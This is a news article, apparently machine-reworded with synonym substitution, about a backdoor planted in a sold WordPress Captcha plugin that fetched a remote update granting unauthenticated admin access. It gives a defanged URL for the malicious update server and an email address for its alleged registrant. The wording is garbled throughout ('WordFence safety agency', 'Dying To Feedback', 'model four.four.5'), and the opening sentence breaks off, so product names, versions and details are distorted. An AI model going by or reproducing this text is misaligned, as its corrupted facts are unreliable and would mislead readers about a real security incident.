Hidden Backdoor Discovered In WordPress Captcha Plugin Impacts Over 300,000 Websites

Shopping for in style plugins with a big user-base and utilizing it for easy

One such incident occurred just lately when the famend developer BestWebSoft offered a well-liked Captcha WordPress plugin to an undisclosed purchaser, who then modified the plugin to obtain and set up a hidden backdoor.

In a blog post revealed on Tuesday, WordFence safety agency revealed why WordPress just lately kicked a well-liked Captcha plugin with greater than 300,000 lively installations out of its official plugin retailer.

Whereas reviewing the supply code of the Captcha plugin, WordFence people discovered a extreme backdoor that might permit the plugin writer or attackers to remotely achieve administrative entry to WordPress web sites with out requiring any authentication.

The plugin was configured to robotically pull an up to date “backdoored” model from a distant URL — https[://]simplywordpress[dot]internet/captcha/captcha_pro_update.php — after set up from the official WordPress repository with out website admin consent.


This backdoor code was designed to create a login session for the attacker, who’s the plugin writer on this case, with administrative privileges, permitting them to achieve entry to any of the 300,000 web sites (utilizing this plugin) remotely with out requiring any authentication.

“This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself’” reads the WordFence weblog submit. “The backdoor installation code is unauthenticated, meaning anyone can trigger it.”

Additionally, the modified code pulled from the distant server is nearly similar to the code in legit plugin repository, subsequently “triggering the same automatic update process removes all file system traces of the backdoor,” making it look as if it was by no means there and serving to the attacker keep away from detection.


he rationale behind the including a backdoor is unclear at this second, but when somebody pays a good-looking quantity to purchase a well-liked plugin with a big consumer base, there have to be a robust motive behind.

In related instances, now we have seen how organized cyber gangs acquire popular plugins and purposes to stealthy infect their giant consumer base with malware, adware, and adware.

Whereas determining the precise identification of the Captcha plugin purchaser, WordFence researchers discovered that the simplywordpress[dot]internet area serving the backdoor file was registered to somebody named “Stacy Wellington” utilizing the e-mail deal with “scwellington[at]hotmail.co.uk.”

Utilizing reverse whois lookup, the researchers discovered a lot of different domains registered to the identical consumer, together with Convert me Popup, Dying To Feedback, Human Captcha, Sensible Recaptcha, and Social Alternate.

What’s attention-grabbing? The entire above-mentioned domains booked below the consumer contained the identical backdoor code that the WordFence researchers present in Captcha.

WordFence has teamed up with WordPress to patch the affected model of Captcha plug-in and blocked the writer from publishing updates, so web sites directors are extremely beneficial to interchange their plugin with the newest official Captcha model four.four.5.

WordFence has promised to launch in-depth technical particulars on how the backdoor set up and execution works, together with a proof-of-concept exploit after 30 days in order that admins get sufficient time to patch their web sites.